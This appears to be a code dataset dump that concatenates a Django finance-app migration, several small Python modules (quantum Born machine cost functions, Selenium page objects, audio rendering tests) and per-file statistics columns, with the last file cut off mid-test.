initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('parent_category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.Category')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('payment', models.CharField(max_length=100)),
('initial_amount', models.DecimalField(decimal_places=2, max_digits=10)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('enabled', models.BooleanField(default=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='TransactionType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('transaction_type', models.CharField(max_length=100)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('transaction_date', models.DateField()),
('description', models.CharField(blank=True, max_length=500)),
('amount', models.DecimalField(decimal_places=2, max_digits=10)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Category')),
('payment_source', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='payment_source', to='api.Payment')),
('payment_target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='payment_target', to='api.Payment')),
('tag', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.Tag')),
('transaction_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.TransactionType')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PaymentInitial',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, max_digits=10)),
('payment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='payment_initial', to='api.Payment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'unique_together': {('user', 'payment')},
},
),
]
| 52.2375 | 171 | 0.614501 | 441 | 4,179 | 5.662132 | 0.185941 | 0.048058 | 0.078494 | 0.123348 | 0.751302 | 0.729676 | 0.729676 | 0.729676 | 0.729676 | 0.670805 | 0 | 0.012346 | 0.244078 | 4,179 | 79 | 172 | 52.898734 | 0.778094 | 0.010768 | 0 | 0.555556 | 1 | 0 | 0.103098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.097222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb513f1a011c3d4aad7783997f86ec67a1c17b1e | 29 | py | Python | rekord_wrangler/ui/__init__.py | tullyvey/rekord-wrangler | a1c5fdbbf2d0f20b0a2daf9a2b0336de71478918 | [
"MIT"
] | null | null | null | rekord_wrangler/ui/__init__.py | tullyvey/rekord-wrangler | a1c5fdbbf2d0f20b0a2daf9a2b0336de71478918 | [
"MIT"
] | null | null | null | rekord_wrangler/ui/__init__.py | tullyvey/rekord-wrangler | a1c5fdbbf2d0f20b0a2daf9a2b0336de71478918 | [
"MIT"
] | null | null | null | from .main import MainWindow
| 14.5 | 28 | 0.827586 | 4 | 29 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
24a4db80effede1a31ee897cfae682169088ba14 | 61 | py | Python | conda_forge_tick/__init__.py | brlavon14/cf-scripts | 417f547c3fd269ed581b13f9444462a5b2f8bb46 | [
"BSD-3-Clause"
] | null | null | null | conda_forge_tick/__init__.py | brlavon14/cf-scripts | 417f547c3fd269ed581b13f9444462a5b2f8bb46 | [
"BSD-3-Clause"
] | null | null | null | conda_forge_tick/__init__.py | brlavon14/cf-scripts | 417f547c3fd269ed581b13f9444462a5b2f8bb46 | [
"BSD-3-Clause"
] | null | null | null | import xonsh.imphooks
xonsh.imphooks.install_import_hooks()
| 15.25 | 37 | 0.852459 | 8 | 61 | 6.25 | 0.625 | 0.52 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 61 | 3 | 38 | 20.333333 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
24adfecddad9402e81cc1f4275ba8f83f17252c6 | 66 | py | Python | tests/zip/source/func.py | fbiville/python3-function-invoker | 12056d22dd4abf89377005fdad75c472a2c5a444 | [
"Apache-2.0"
] | 3 | 2018-03-25T08:25:26.000Z | 2019-02-10T02:01:12.000Z | tests/zip/source/func.py | fbiville/python3-function-invoker | 12056d22dd4abf89377005fdad75c472a2c5a444 | [
"Apache-2.0"
] | 11 | 2018-03-14T23:14:23.000Z | 2019-11-08T16:33:40.000Z | tests/zip/source/func.py | fbiville/python3-function-invoker | 12056d22dd4abf89377005fdad75c472a2c5a444 | [
"Apache-2.0"
] | 7 | 2018-02-22T16:18:45.000Z | 2019-03-12T02:45:46.000Z | from helpers import upper
def handler(val):
return upper(val)
| 16.5 | 25 | 0.742424 | 10 | 66 | 4.9 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 3 | 26 | 22 | 0.907407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
24be65b4126c52a869a9c759923ca1fd8d99e12e | 45 | py | Python | enthought/pyface/list_box.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 3 | 2016-12-09T06:05:18.000Z | 2018-03-01T13:00:29.000Z | enthought/pyface/list_box.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 1 | 2020-12-02T00:51:32.000Z | 2020-12-02T08:48:55.000Z | enthought/pyface/list_box.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | null | null | null | # proxy module
from pyface.list_box import *
| 15 | 29 | 0.777778 | 7 | 45 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 2 | 30 | 22.5 | 0.894737 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
24f1c0050dd3975d2dc4f3ef983ec7657831f4d8 | 18,477 | py | Python | cost_functions.py | mrnp95/IsingBornMachine | 23cf1917a8aa977bb25f0113d8df51f0643d72f1 | [
"MIT"
] | 16 | 2019-04-05T01:03:15.000Z | 2022-02-03T10:57:42.000Z | cost_functions.py | mrnp95/IsingBornMachine | 23cf1917a8aa977bb25f0113d8df51f0643d72f1 | [
"MIT"
] | 1 | 2021-01-19T03:02:18.000Z | 2021-01-23T23:14:22.000Z | cost_functions.py | mrnp95/IsingBornMachine | 23cf1917a8aa977bb25f0113d8df51f0643d72f1 | [
"MIT"
] | 1 | 2020-10-19T13:25:13.000Z | 2020-10-19T13:25:13.000Z | import numpy as np
from random import *
from classical_kernel import GaussianKernelArray
from quantum_kernel import QuantumKernelArray
from numpy import linalg as LA
from file_operations_in import KernelDictFromFile
import stein_functions as sf
import sinkhorn_functions as shornfun
import auxiliary_functions as aux
import sys
import json
import time
def KernelSum(samplearray1, samplearray2, kernel_dict):
'''
This function computes the contribution to the MMD from the empirical distibutions
from two sets of samples.
kernel_dict contains the kernel values for all pairs of binary strings
'''
if type(samplearray1) is not np.ndarray or type(samplearray2) is not np.ndarray:
raise TypeError('The input samples must be in numpy arrays')
N_samples1 = samplearray1.shape[0]
N_samples2 = samplearray2.shape[0]
kernel_array = np.zeros((N_samples1, N_samples2))
for sample1_index in range(0, N_samples1):
for sample2_index in range(0, N_samples2):
sample1 = aux.ToString(samplearray1[sample1_index])
sample2 = aux.ToString(samplearray2[sample2_index])
kernel_array[sample1_index, sample2_index] = kernel_dict[(sample1, sample2)]
return kernel_array
def CostFunction(qc, cost_func, data_samples, data_exact_dict, born_samples, born_probs_dict,
N_samples, kernel_choice, stein_params, flag, sinkhorn_eps):
'''
This function computes the cost function between two distributions P and Q from samples from P and Q
'''
#Extract unique samples and corresponding empirical probabilities from set of samples
born_emp_samples, born_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples)
data_emp_samples, data_emp_probs, _, _ = aux.ExtractSampleInformation(data_samples)
if cost_func.lower() == 'mmd':
score_choice = stein_params[0]
if score_choice.lower() == 'approx':
if (flag.lower() == 'onfly'):
if (kernel_choice.lower() == 'gaussian'):
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all samples in the sample space
kernel_born_born_emp = GaussianKernelArray(born_emp_samples, born_emp_samples, sigma)
kernel_born_data_emp = GaussianKernelArray(born_emp_samples, data_emp_samples, sigma)
kernel_data_data_emp = GaussianKernelArray(data_emp_samples, data_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_born_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_emp_samples)
kernel_born_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, data_emp_samples)
kernel_data_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_emp_samples, data_emp_samples)
elif (flag.lower() == 'precompute'):
#Compute the empirical data distibution given samples
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_born_emp = KernelSum(born_emp_samples, born_emp_samples, kernel_dict)
kernel_born_data_emp = KernelSum(born_emp_samples, data_emp_samples, kernel_dict)
kernel_data_data_emp = KernelSum(data_emp_samples, data_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss = np.dot(np.dot(born_emp_probs, kernel_born_born_emp), born_emp_probs) \
- 2*np.dot(np.dot(born_emp_probs, kernel_born_data_emp), data_emp_probs) \
+ np.dot(np.dot(data_emp_probs, kernel_data_data_emp), data_emp_probs)
elif score_choice.lower() == 'exact':
#Compute MMD using exact data probabilities if score is exact
data_exact_samples = aux.SampleListToArray(list(data_exact_dict.keys()), len(qc.qubits()), 'int')
data_exact_probs = np.asarray(list(data_exact_dict.values()))
if (flag.lower() == 'onfly'):
if (kernel_choice.lower() == 'gaussian'):
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all samples in the sample space
kernel_born_born_emp = GaussianKernelArray(born_emp_samples, born_emp_samples, sigma)
kernel_born_data_emp = GaussianKernelArray(born_emp_samples, data_exact_samples, sigma)
kernel_data_data_emp = GaussianKernelArray(data_exact_samples, data_exact_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_born_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_emp_samples)
kernel_born_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, data_exact_samples)
kernel_data_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_exact_samples, data_exact_samples)
elif (flag.lower() == 'precompute'):
#Compute the empirical data distibution given samples
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_born_emp = KernelSum(born_emp_samples, born_emp_samples, kernel_dict)
kernel_born_data_emp = KernelSum(born_emp_samples, data_exact_samples, kernel_dict)
kernel_data_data_emp = KernelSum(data_exact_samples, data_exact_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss = np.dot(np.dot(born_emp_probs, kernel_born_born_emp), born_emp_probs) \
- 2*np.dot(np.dot(born_emp_probs, kernel_born_data_emp), data_emp_probs) \
+ np.dot(np.dot(data_exact_probs, kernel_data_data_emp), data_emp_probs)
elif cost_func.lower() == 'stein':
if flag.lower() == 'onfly':
if (kernel_choice.lower() == 'gaussian'):
sigma = np.array([0.25, 10, 1000])
kernel_array = GaussianKernelArray(born_emp_samples, born_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
kernel_array ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_samples, born_samples)
else: raise ValueError('Stein only supports Gaussian kernel currently')
elif flag.lower() == 'precompute':
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_array = KernelSum(born_emp_samples, born_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
stein_flag = 'Precompute'
kernel_stein_weighted = sf.WeightedKernel(qc,kernel_choice, kernel_array, N_samples, \
data_samples, data_exact_dict, \
born_emp_samples, born_emp_samples, \
stein_params, stein_flag)
loss = np.dot(np.dot(born_emp_probs, kernel_stein_weighted), born_emp_probs)
elif cost_func.lower() == 'sinkhorn':
#If Sinkhorn cost function to be used
loss = shornfun.FeydySink(born_samples, data_samples, sinkhorn_eps).item()
else: raise ValueError('\'cost_func\' must be either \'MMD\', \'Stein\', or \'Sinkhorn\' ')
return loss
def CostGrad(qc, cost_func, data_samples, data_exact_dict,
born_samples, born_probs_dict, born_samples_pm,
N_samples, kernel_choice, stein_params, flag, sinkhorn_eps):
'''
This function computes the gradient of the desired cost function, cost_func, using the various parameters
'''
[born_samples_plus, born_samples_minus] = born_samples_pm
#extract unique samples, and corresponding probabilities from a list of samples
born_emp_samples, born_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples)
data_emp_samples, data_emp_probs, _, _ = aux.ExtractSampleInformation(data_samples)
born_plus_emp_samples, born_plus_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples_plus)
born_minus_emp_samples, born_minus_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples_minus)
if cost_func.lower() == 'mmd':
score_choice = stein_params[0]
if score_choice.lower() == 'approx':
if flag.lower() == 'onfly':
if kernel_choice.lower() == 'gaussian':
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all pairs of samples required
kernel_born_plus_emp = GaussianKernelArray(born_emp_samples, born_plus_emp_samples, sigma)
kernel_born_minus_emp = GaussianKernelArray(born_emp_samples, born_minus_emp_probs, sigma)
kernel_data_plus_emp = GaussianKernelArray(data_emp_samples, born_plus_emp_samples, sigma)
kernel_data_minus_emp = GaussianKernelArray(data_emp_samples, born_minus_emp_probs, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_plus_emp_samples)
kernel_born_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_minus_emp_probs)
kernel_data_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_emp_samples, born_plus_emp_samples)
kernel_data_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_emp_samples, born_minus_emp_probs)
elif flag.lower() == 'precompute':
#To speed up computation, read in precomputed kernel dicrionary from a file.
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_plus_emp = KernelSum(born_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_born_minus_emp = KernelSum(born_emp_samples, born_minus_emp_samples, kernel_dict)
kernel_data_plus_emp = KernelSum(data_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_data_minus_emp = KernelSum(data_emp_samples, born_minus_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss_grad = 2*( np.dot(np.dot(born_emp_probs, kernel_born_minus_emp), born_minus_emp_probs) \
- np.dot(np.dot(born_emp_probs, kernel_born_plus_emp), born_plus_emp_probs) \
- np.dot(np.dot(data_emp_probs, kernel_data_minus_emp), born_minus_emp_probs) \
+ np.dot(np.dot(data_emp_probs, kernel_data_plus_emp), born_plus_emp_probs) )
elif score_choice.lower() == 'exact':
#Compute MMD using exact data probabilities if score is exact
data_exact_samples = aux.SampleListToArray(list(data_exact_dict.keys()), len(qc.qubits()), 'int')
data_exact_probs = np.asarray(list(data_exact_dict.values()))
if flag.lower() == 'onfly':
if kernel_choice.lower() == 'gaussian':
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all pairs of samples required
kernel_born_plus_emp = GaussianKernelArray(born_emp_samples, born_plus_emp_samples, sigma)
kernel_born_minus_emp = GaussianKernelArray(born_emp_samples, born_minus_emp_probs, sigma)
kernel_data_plus_emp = GaussianKernelArray(data_exact_samples, born_plus_emp_samples, sigma)
kernel_data_minus_emp = GaussianKernelArray(data_exact_samples, born_minus_emp_probs, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_plus_emp_samples)
kernel_born_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_minus_emp_probs)
kernel_data_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_exact_samples, born_plus_emp_samples)
kernel_data_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_exact_samples, born_minus_emp_probs)
elif flag.lower() == 'precompute':
#To speed up computation, read in precomputed kernel dicrionary from a file.
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_plus_emp = KernelSum(born_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_born_minus_emp = KernelSum(born_emp_samples, born_minus_emp_samples, kernel_dict)
kernel_data_plus_emp = KernelSum(data_exact_samples, born_plus_emp_samples, kernel_dict)
kernel_data_minus_emp = KernelSum(data_exact_samples, born_minus_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss_grad = 2*( np.dot(np.dot(born_emp_probs, kernel_born_minus_emp), born_minus_emp_probs) \
- np.dot(np.dot(born_emp_probs, kernel_born_plus_emp), born_plus_emp_probs) \
- np.dot(np.dot(data_exact_probs, kernel_data_minus_emp), born_minus_emp_probs) \
+ np.dot(np.dot(data_exact_probs, kernel_data_plus_emp), born_plus_emp_probs) )
elif cost_func.lower() == 'stein':
sigma = np.array([0.25, 10, 1000])
[born_samples_plus, born_samples_minus] = born_samples_pm
if flag.lower() == 'onfly':
if kernel_choice.lower() == 'gaussian':
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all pairs of samples required
kernel_born_plus_emp = GaussianKernelArray(born_emp_samples, born_plus_emp_samples, sigma)
kernel_born_minus_emp = GaussianKernelArray(born_emp_samples, born_minus_emp_probs, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_plus_emp_samples)
kernel_born_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_minus_emp_probs)
elif flag.lower() == 'precompute':
#To speed up computation, read in precomputed kernel dicrionary from a file.
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_plus_emp = KernelSum(born_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_born_minus_emp = KernelSum(born_emp_samples, born_minus_emp_samples, kernel_dict)
kernel_plus_born_emp = np.transpose(kernel_born_plus_emp)
kernel_minus_born_emp = np.transpose(kernel_born_minus_emp)
stein_kernel_choice = stein_params[3]
# Compute the weighted kernel for each pair of samples required in the gradient of Stein Cost Function
kappa_q_born_bornplus = sf.WeightedKernel(qc, stein_kernel_choice, kernel_born_plus_emp, N_samples, data_samples, data_exact_dict,\
born_emp_samples, born_plus_emp_samples, stein_params, flag)
kappa_q_bornplus_born = sf.WeightedKernel(qc, stein_kernel_choice, kernel_plus_born_emp, N_samples, data_samples, \
data_exact_dict, born_plus_emp_samples, born_emp_samples, stein_params, flag)
kappa_q_born_bornminus = sf.WeightedKernel(qc, stein_kernel_choice, kernel_born_minus_emp, N_samples, data_samples,\
data_exact_dict, born_emp_samples, born_minus_emp_samples, stein_params, flag)
kappa_q_bornminus_born = sf.WeightedKernel(qc, stein_kernel_choice, kernel_minus_born_emp, N_samples, data_samples,\
data_exact_dict, born_minus_emp_samples, born_emp_samples, stein_params, flag)
loss_grad = np.dot(np.dot(born_emp_probs, kappa_q_born_bornminus), born_minus_emp_probs) \
+ np.dot(np.dot(born_minus_emp_probs, kappa_q_bornminus_born), born_emp_probs) \
- np.dot(np.dot(born_emp_probs, kappa_q_born_bornplus), born_plus_emp_probs) \
- np.dot(np.dot(born_plus_emp_probs, kappa_q_bornplus_born), born_emp_probs)
elif cost_func.lower() == 'sinkhorn':
# loss_grad = shornfun.SinkhornGrad(born_samples_pm, data_samples, sinkhorn_eps)
loss_grad = shornfun.SinkGrad(born_samples, born_samples_pm, data_samples, sinkhorn_eps)
else: raise ValueError('\'cost_func\' must be either \'MMD\', \'Stein\', or \'Sinkhorn\' ')
return loss_grad
| 60.580328 | 139 | 0.661796 | 2,277 | 18,477 | 4.958718 | 0.075099 | 0.080595 | 0.059516 | 0.04942 | 0.840847 | 0.828093 | 0.802055 | 0.77823 | 0.728988 | 0.694004 | 0 | 0.007552 | 0.261839 | 18,477 | 304 | 140 | 60.779605 | 0.820295 | 0.120041 | 0 | 0.544041 | 0 | 0 | 0.031339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015544 | false | 0 | 0.062176 | 0 | 0.093264 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
706d1d9850e37e657caa2704bd798d9015a6db7e | 2,065 | py | Python | script/pages/regist_page.py | ybkuroki/selenium-e2e-sample | 18a7e92d9b338104ac8b418a6987cadfd1c12d39 | [
"MIT"
] | 1 | 2021-09-08T20:05:40.000Z | 2021-09-08T20:05:40.000Z | script/pages/regist_page.py | ybkuroki/selenium-e2e-sample | 18a7e92d9b338104ac8b418a6987cadfd1c12d39 | [
"MIT"
] | null | null | null | script/pages/regist_page.py | ybkuroki/selenium-e2e-sample | 18a7e92d9b338104ac8b418a6987cadfd1c12d39 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
from selenium.webdriver.common.keys import Keys
from pages import PageObject
from time import sleep
# 登録画面
class RegistPage(PageObject):
# 新規登録メニューを押下する。
def click_regist_menu(self):
self.find_element_by_xpath("//div[contains(@class, 'ui fixed top menu')]/a[contains(@class, 'item')][2]").click()
sleep(1)
# 書籍タイトルを入力する。
def set_title(self, title):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][1]/input").send_keys(title)
# ISBNを入力する。
def set_isbn(self, isbn):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][2]/input").send_keys(isbn)
# カテゴリを設定する。
def set_category(self, category):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][3]/div[contains(@class, 'ui selection dropdown')]").click()
sleep(0.5)
self.find_element_by_xpath("//div[contains(@class, 'menu transition visible')]/div[contains(text(), '" + category + "')]").click()
sleep(0.5)
# 形式を設定する。
def set_format(self, format):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][4]/div[contains(@class, 'ui selection dropdown')]").click()
sleep(0.5)
self.find_element_by_xpath("//div[contains(@class, 'menu transition visible')]/div[contains(text(), '" + format + "')]").click()
sleep(0.5)
# 登録ボタンを押下する。
def click_regist_button(self):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'actions')]/div[contains(text(), '登録')]").click()
sleep(5)
| 51.625 | 243 | 0.660048 | 272 | 2,065 | 4.886029 | 0.238971 | 0.215199 | 0.2769 | 0.162528 | 0.647103 | 0.647103 | 0.647103 | 0.647103 | 0.647103 | 0.647103 | 0 | 0.00907 | 0.145763 | 2,065 | 39 | 244 | 52.948718 | 0.744331 | 0.047942 | 0 | 0.166667 | 0 | 0.25 | 0.534219 | 0.384065 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
70a4dd3264345101446d0a6410a8c131eec1b019 | 41,573 | py | Python | tests/nonrealtime/test_nonrealtime_Session_render.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/nonrealtime/test_nonrealtime_Session_render.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/nonrealtime/test_nonrealtime_Session_render.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | import os
import pathlib
import pprint
import pytest
import uqbar.strings
import supriya
import supriya.nonrealtime
import supriya.soundfiles
def test_00a(nonrealtime_paths):
"""
No input, no output file path specified, no render path specified.
"""
session = pytest.helpers.make_test_session()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pathlib.Path(supriya.output_path) in output_file_path.parents
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
def test_00b(nonrealtime_paths):
"""
No input, no output file path specified, render path specified.
"""
session = pytest.helpers.make_test_session()
exit_code, output_file_path = session.render(
